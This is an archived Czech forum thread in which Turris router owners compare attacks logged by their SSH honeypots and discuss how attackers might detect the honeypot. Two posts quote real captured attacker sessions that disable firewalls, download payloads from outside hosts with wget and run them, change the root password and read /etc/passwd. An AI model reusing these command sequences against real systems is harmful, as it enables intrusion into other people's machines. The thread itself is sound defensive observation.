SSH Honeypot - zdvojené pokusy...

Milí majitelé routerů Turris,

toto fórum bylo 9. 12. 2016 zmrazeno a nahrazeno naším novým Turris fórem. Ještě chvíli bude dostupné k prohlížení, ale již zde není možné přispívat. Více informací naleznete v oznámení o uzavření fóra.

Dear Turris routers users,

this forum has been frozen on Dec 9th, 2016 and replaced by our new Turris forum. It will be read-only accessible for some time after. For more information, read the announcement about closing the forum.

Od commar

Dne 2015-08-12 09:26

Při dnešní kontrole výpisu z Honeypotu mě napadlo:
nyní všichni útočníci (alespoň u mě) provedou dva pokusy, jednou admin/admin podruhé root/root.
Je žádoucí jim to takhle povolit?
Nemůže útočníka napadnout, že pokud oba projdou, jde o honeypot?
Nebylo by lepší jeden pokus blokovat?
Tohle mi připadá jen takové oťukávání, s následným uložením IP adres na další pokusy.
Pokud projdou oba pokusy, může to útočník rovnou odfiltrovat a dále nezkoušet.

Co vy na to? Díky...

Od Eskymák (>)

Dne 2015-08-12 17:51

V systému mohou být aktivní oba účty zároveň, tak proč to nezkusit.

Zajímalo by mne, jestli už někdo zaznamenal i (následné) pokusy o něco jiného, než oťukávání pomocí echo.

Od Michal

Dne 2015-08-12 18:01

jeden příklad

Jméno uživatele:

root

Heslo:

root

$ id Přijato 8. 8. 2015 14:57:00
$ cd /lib Přijato 8. 8. 2015 14:57:04
$ wget best1.now.im/1 Přijato 8. 8. 2015 14:57:08
$ perl 1 Přijato 8. 8. 2015 14:57:11
$ perl 1 Přijato 8. 8. 2015 14:57:12
$ perl 1 Přijato 8. 8. 2015 14:57:13
$ perl 1 Přijato 8. 8. 2015 14:57:13
$ perl 1 Přijato 8. 8. 2015 14:57:14
$ perl 1 Přijato 8. 8. 2015 14:57:14
$ passwd root Přijato 8. 8. 2015 15:00:43
$ Hello123 Zamítnuto 8. 8. 2015 15:00:46
$ Hello123 Zamítnuto 8. 8. 2015 15:00:49
$ cat /etc/passwd Přijato 8. 8. 2015 15:00:55
$ id Přijato 8. 8. 2015 15:01:15
$ nano 1 Zamítnuto 8. 8. 2015 15:01:22
$ apt-get install nano Přijato 8. 8. 2015 15:01:27
$ nano 1 Zamítnuto 8. 8. 2015 15:01:40
$ nano Zamítnuto 8. 8. 2015 15:01:46
$ reboot Přijato 8. 8. 2015 15:01:50
a není to jediný pokus

Od JFila

Dne 2015-08-12 18:19

U nás třeba toto:

$ /etc/init.d/iptables stop Zamítnuto 25. 7. 2015 11:44:00
$ service iptables stop Zamítnuto 25. 7. 2015 11:44:00
$ SuSEfirewall2 stop Zamítnuto 25. 7. 2015 11:44:00
$ reSuSEfirewall2 stop Zamítnuto 25. 7. 2015 11:44:00
$ wget -c http://1.93.39.147:90/ngin Přijato 25. 7. 2015 11:44:00
$ chmod 777 ngin Přijato 25. 7. 2015 11:44:23
$ ./ngin Zamítnuto 25. 7. 2015 11:44:23

nebo toto:

$ w Přijato 23. 7. 2015 18:52:24
$ uptime Přijato 23. 7. 2015 18:52:27
$ wget Přijato 23. 7. 2015 18:52:32
$ apt-get Přijato 23. 7. 2015 18:52:36
$ yum Zamítnuto 23. 7. 2015 18:52:41

Od commar

Dne 2015-08-12 21:08

Já mám v 90% ECHO...

Od fojtp

Dne 2015-08-13 13:27

"echo -n test" ?
tim si taky testuji honeypot

Od commar

Dne 2015-08-13 13:37

Ano, proto to moje zamyšlení v prvním příspěvku...

Od Eskymák (>)

Dne 2015-08-13 16:29

Zajímavé, myslíte že tyto příkazy posílá už člověk nebo stále nějaký bot? Nezaznamenal někdo pokus o instalaci tohoto software? I když toto může být oťukání před instalací.

Většina těch klasických "echo" útoků je nejspíš od napadených routerů, na které funguje právě admin/admin a root/root případně ještě ubnt/ubnt.